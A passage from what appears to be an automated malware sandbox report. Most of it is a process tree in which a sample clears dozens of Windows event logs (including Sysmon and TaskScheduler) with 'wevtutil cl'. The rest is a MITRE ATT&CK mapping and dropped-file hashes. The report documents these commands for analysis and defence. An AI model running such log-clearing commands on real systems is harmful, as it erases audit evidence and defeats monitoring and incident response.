        7⤵
        Clears Windows event logs
        
        PID:1352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
        7⤵
        
        PID:2624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
        7⤵
        
        PID:5044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
        7⤵
        
        PID:2080
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartScreen/Debug"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Audit"
        7⤵
        
        PID:1072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
        7⤵
        
        PID:4892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
        7⤵
        
        PID:5716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
        7⤵
        
        PID:3660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        7⤵
        
        PID:5064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
        7⤵
        
        PID:5604
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
        7⤵
        
        PID:1704
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
        7⤵
        
        PID:5648
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
        7⤵
        
        PID:5696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
        7⤵
        
        PID:5672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
        7⤵
        
        PID:5676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
        7⤵
        
        PID:2388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
        7⤵
        
        PID:5152
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
        7⤵
        
        PID:5180
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
        7⤵
        
        PID:652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
        7⤵
        
        PID:4964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
        7⤵
        Clears Windows event logs
        
        PID:5144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
        7⤵
        
        PID:5408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Debug"
        7⤵
        
        PID:2656
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Diagnose"
        7⤵
        
        PID:5192
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Operational"
        7⤵
        
        PID:5200
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
        7⤵
        
        PID:6040
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Analytic"
        7⤵
        
        PID:6056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Debug"
        7⤵
        
        PID:5084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Diagnose"
        7⤵
        
        PID:1776
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Operational"
        7⤵
        Clears Windows event logs
        
        PID:1136
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Admin"
        7⤵
        
        PID:4480
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Analytic"
        7⤵
        
        PID:728
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
        7⤵
        
        PID:4616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Diagnose"
        7⤵
        
        PID:3568
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Operational"
        7⤵
        
        PID:1820
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Admin"
        7⤵
        
        PID:764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
        7⤵
        
        PID:3844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Debug"
        7⤵
        
        PID:1464
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Diagnose"
        7⤵
        
        PID:5244
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Health"
        7⤵
        
        PID:5240
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Operational"
        7⤵
        
        PID:5272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
        7⤵
        
        PID:5260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Tiering/Admin"
        7⤵
        
        PID:5332
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageManagement/Debug"
        7⤵
        
        PID:1060
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageManagement/Operational"
        7⤵
        
        PID:5352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSettings/Diagnostic"
        7⤵
        
        PID:2164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
        7⤵
        
        PID:2460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Operational"
        7⤵
        
        PID:900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Performance"
        7⤵
        
        PID:2808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
        7⤵
        
        PID:1396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
        7⤵
        
        PID:4580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
        7⤵
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Store/Operational"
        7⤵
        
        PID:2196
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storsvc/Diagnostic"
        7⤵
        
        PID:3052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
        7⤵
        
        PID:5448
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
        7⤵
        
        PID:3928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/PfApLog"
        7⤵
        
        PID:932
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
        7⤵
        
        PID:2316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
        7⤵
        
        PID:5356
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
        7⤵
        
        PID:4444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
        7⤵
        
        PID:4576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsHandlers/Debug"
        7⤵
        
        PID:3132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Debug"
        7⤵
        
        PID:3336
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
        7⤵
        
        PID:5188
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
        7⤵
        
        PID:4544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TCPIP/Operational"
        7⤵
        
        PID:5968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
        7⤵
        
        PID:2520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
        7⤵
        
        PID:5532
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
        7⤵
        
        PID:2576
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TTS/Diagnostic"
        7⤵
        
        PID:5520
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinAPI/Diagnostic"
        7⤵
        
        PID:1684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinUI/Diagnostic"
        7⤵
        
        PID:3112
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZSync/Analytic"
        7⤵
        
        PID:4072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
        7⤵
        
        PID:4736
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
        7⤵
        
        PID:4084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
        7⤵
        
        PID:324
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
        7⤵
        
        PID:2036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
        7⤵
        
        PID:4740
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TenantRestrictions/Operational"
        7⤵
        
        PID:392
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
        7⤵
        
        PID:1252
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
        7⤵
        
        PID:4972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
        7⤵
        
        PID:5564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
        7⤵
        
        PID:4440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
        7⤵
        
        PID:640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
        7⤵
        
        PID:2844
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
        7⤵
        
        PID:1688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
        7⤵
        
        PID:2720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:1948
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
        7⤵
        
        PID:556
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
        7⤵
        
        PID:4572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Admin"
        7⤵
        
        PID:4160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Analytic"
        7⤵
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Debug"
        7⤵
        
        PID:1036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Time Discovery

T1124

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b5fffb9ed7c2c7454da60348607ac641

SHA1
8d1e01517d1f0532f0871025a38d78f4520b8ebc

SHA256
c8dddfb100f2783ecbb92cec7f878b30d6015c2844296142e710fb9e10cc7c73

SHA512
9182a7b31363398393df0e9db6c9e16a14209630cb256e16ccbe41a908b80aa362fc1a736bdfa94d3b74c3db636dc51b717fc31d33a9fa26c3889dec6c0076a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
32d05d01d96358f7d334df6dab8b12ed

SHA1
7b371e4797603b195a34721bb21f0e7f1e2929da

SHA256
287349738fb9020d95f6468fa4a98684685d0195ee5e63e717e4b09aa99b402e

SHA512
e7f73b1af7c7512899728708b890acd25d4c68e971f84d2d5bc24305f972778d8bced6a3c7e3d9f977cf2fc82e0d9e3746a6ccb0f9668a709ac8a4db290c551c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
f1e7c6d693fee764bdccc86d1e893b89

SHA1
6c491382461f747f5b5908ac158d5159b21fa1a4

SHA256
6e5d69e036fc3187e950f519d3fddc5eb0b132008c22f8065abaede7b9b4c52f

SHA512
804b43ce4fe8657d13d6ff8f4dd1adb60927ebfc31f4c7ed28b7c1a8dfe3fb6e1bcafcfe341c75cfbb1e069cab254332a30ef10cf9354b3874c673b3478d021e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
504B

MD5
2c7cd257d04ab755b07c5b7eef63cd7a

SHA1
6789a338c79590c8ef253b0d0c4eefa635ddf6ec

SHA256
5c7aa9e7f3a39f69eeb9acffd8a14d82f0d835d2493d37c7c412e3fd863071fa

SHA512
0ba7d72efefa3571b0e3564cdfff1c3691e1c765b5cbef3f1f3dbfbd8afcff00a8e3a91a5e840c66805521b80ec91880f69af2da58414e7ad4f5d6704b6541a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
1077a42c6440197802bdc60f9970ed7f

SHA1
7a3d1ee4ca7a03248c52186219d7d041663fc48c

SHA256
03737e3419ed6d6eec2a3070fd3e0bf53f174a153c19e8b0ab337d1f02ed921d

SHA512
ad211f8176aba28bcd4cca7737f8fa86560656adde07147d92576404773fade426751cd62aefccbb736388393c66ea8e7f5e2191c4a7afbe3f907568cf93d916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d3dd01a7ee88d6590a6689e37df0e4c9

SHA1
d5e9f7aa2c9585f89823d870b51bda916a13aa2a

SHA256
0c30704e6d4a7ee300eb8887b35adc9fb89b1329114a4951a408b2b743d073fd

SHA512
c16e67e98cef3452d7dc170350d3578c0f0c92cdd11f2edee07c7bcf027fa79b0920eb8a6f1ceccdaf95c534e6acb93d8c7fc12b6099ae4d04690a1cbc8d8757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6e466bd18b7f6077ca9f1d3c125ac5c2

SHA1
32a4a64e853f294d98170b86bbace9669b58dfb8

SHA256
74fc4f126c0a55211be97a17dc55a73113008a6f27d0fc78b2b47234c0389ddc

SHA512
9bd77ee253ce4d2971a4b07ed892526ed20ff18a501c6ba2a180c92be62e4a56d4bbf20ba3fc4fbf9cf6ce68b3817cb67013ad5f30211c5af44c1e98608cb9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
8d97ac65c35acc2a4db41c029f23d1b6

SHA1
ce80016b5268436e332d39de26a1d08c46e0319f

SHA256
535f78b19014b6a4412df37250262332869c74fbe4f63eb80c9a46d507c306f7

SHA512
8f14210be7b8a85ca4edf54c8f6a4a80c9cdb5abbdb3a500463db2225a0c39f89977f523da327e725cd8d1fdb73b055a44900b704f33a8e7ba0797a554adaffd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
c2118d6420c2465689e78a1cdb376886

SHA1
8a48a4b06ab5a61214b17e97a7dcd6db228ec402

SHA256
124e95e85e6fab073dae8c58f9c0758b11b1dd5b5ee9a8c44ea2c93a4e4d2414

SHA512
73c0f5bc619ebd926f32c190812137d7bec409562c9495cff8013a5b1615dc587f2ef1452047020ad0748d4cf62f86c7ecc9d1cb9d365002df920a107a4d8253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\.ses

Filesize
53B

MD5
3285551e464d27998d7e2b770b49b389

SHA1
eb5e192f8a58ce1acb2559ba1707a2d3a69d2ecc

SHA256
4cea932d4393bc04b493e184e5c7418a77c232f510229de99d3e9161cda1e8c5

SHA512
3da13433a8f51f2d565c6f3075849bb60fefe9c78b00a3d44b5831f67a46177191f8562f2afc8e6743ba15556c7ac7c66626d9ca22e9eb03683234baa495719a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1330.tmp\1331.tmp\1332.bat

Filesize
679B

MD5
064bb52705e97caeee4dcbb5c72c1413

SHA1
13107d14185397ad662c08dda51a0ebe7583fbe8

SHA256
a8ef3b7eaef87d32ea17f27c2f9ad0eb46d394fc6f381972657dbae63d0bbb26

SHA512
af599892866fd6bfbe067ee1b2f15e9d201401adedf9db624d0f31d7181754a03cb4ea0fa1fb666598cdb601f212ee79a1c4b437d7e9a25dba901c8c481dc095

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E41.tmp\8E42.tmp\8E43.bat

Filesize
39B

MD5
a9832ef693180ebedb5b6ed08f0b3227

SHA1
b4ebcabbafcb1dcd113cbb7f996c3ea6443ce2b2

SHA256
9f32b3a95a985d2022d6926411a54c8f2518da0d92ac4bb213f723eb7dd09567

SHA512
fb227ed1d0fc39c28981b2c8c3a7f6bdd74e19aabdb4a8209f7e1b5de16bea554a0f6e8580109097a5894b305c2d23fb3d68f65d009c28696fe1d6ee7ae8345b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8CE.tmp\A8CF.tmp\A8DF.bat

Filesize
845B

MD5
54d18c0e0a34808017e53029d7875c09

SHA1
bca96014c545bd02f964cc3dd368b5c6ce9f2963

SHA256
6be64439c492ac7d840e56b01ba9691f30fbad8e9b296bfe55d0abbb2edc5fae

SHA512
95712df3c3bb07e561d778b0f95f9ab0a93def2d7111123dff22898565d059b10dc0ca13b1d528ed00ec77c511451d452b033bf8bf40898cb53eb9378f32a6b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\msedge_installer.log

Filesize
6KB

MD5
cf88198b3cdb6bc19a21f34769272677

SHA1
e2e416f37bb3e5d9237b642f25ecccd68c1ed70e

SHA256
e3b44f2b7fc16a6e83daaf0a061cca97e9024fad32530ad9cef6f452db026090

SHA512
30c337c17286fe4ac6a04eb06688127d09d805673684dc558806655f18c330bc20e90dd61bd192fc913f9f0ef0b18b81a6129229a4c792198aae12c1ca25ca30

Download Submit
C:\Users\Admin\AppData\Roaming\1-RUNFIRST.exe

Filesize
43KB

MD5
6fbe881f1d6480e2e15d3ebe0f493d2d

SHA1
f698079150df242e156223f1b3e46f449bc01415

SHA256
49b84540d5b4b8d2344c25edb042e216592dd1dc78a5c00f2ad9457442c4581c

SHA512
2084a64ab503e214854e02dcb1ed8bff7cab40dad64cb624326d42a087f343a74b7470956c681268725e0ec2f8ab13182c814356d6d6d066a2b0c6da290d16ef

Download Submit
C:\Users\Admin\AppData\Roaming\3combined.bat

Filesize
13KB

MD5
790f1b1425f17c7dc0712486361de838

SHA1
d0056beff646d466a34346ef5c889bfec5cf0986

SHA256
7f01e60396f3dd00c16226f74ab87cd0638368b83c455b04d032f4cba436656a

SHA512
12b1faa363910ed861b831ab4209b93491d78e19ca630650425ed28856435119a1220e675e1971f237139c9140fdf6f70cf6a3ba9083bf2674c0f82fb3df3d4a

Download Submit
C:\Users\Admin\AppData\Roaming\AMIDEWIN.EXE

Filesize
148KB

MD5
182ec3a59bd847fb1bc3e12a41d48fa6

SHA1
2f548bceb819d3843827c1e218af6708db447d4b

SHA256
948dbd2bc128f8dc08267e110020fee3ff5de17cf4aaef89372de29623af96fa

SHA512
91ecc5a76edc2aea4219f68569b54d3e9fe15c2a30a146edc0d09e713feaa739a5c1e7dbfa97e60828696078d43d1f8fd3466234525b099ed6e614e854ac6c4c

Download Submit
C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe

Filesize
219KB

MD5
9353ed7c3ba8e2417ce2664ae7afac16

SHA1
05699a2a2792795db1d8f59273172ad80bdc8b06

SHA256
069b31cb7f9054647b684da4fc5263fa690e32d75729ec6b5c808b0c532b9628

SHA512
cb456c14c9ef6f49a92c989668bedb423e4020b761e627c4d67f90e855e9385d58cf0d1e024a0c728126cccdad2836615d23cd3011a8447470482ca939795262

Download Submit
C:\Users\Admin\AppData\Roaming\Cleaner8.exe

Filesize
156KB

MD5
3546548be0b0940c52ec881d48404818

SHA1
0ded613db5266ffaeac2194bcdd86cec9559ee1c

SHA256
dec2a16531a09d05f1ae64a21c35d53cec5998be22c16a88b2e8b4a36878db9a

SHA512
79cb1de22f0789624e4dff532d28d9203ba231e5d511995562a25da8f112eb21a970cfddf28f14760459dda0407a8f856363fca07afffa5f0a954806af619838

Download Submit
C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe

Filesize
219KB

MD5
303dbf6d5ce6b658919091240d5a4a80

SHA1
d45946e1d3c4d973042e0c1bdd88fbc1774f1385

SHA256
70ef91b18f6532b065712b31cd667d64d9fa4248baabaea3d33297250df0fd18

SHA512
666c82cb9ac94fa16739c2c34a23a9ade83f4ac3cad528109c2f255b8eeda6a31c00613346db3e9a0e3d46dc978df00d02bc4483001282bfd4f6861b44e1d408

Download Submit
C:\Users\Admin\AppData\Roaming\Guna.UI2.dll

Filesize
2.1MB

MD5
c05cf8543a06cf77ba8e3d03c1b39870

SHA1
40d53bcdc940fafccf02404866d9d917c0a84696

SHA256
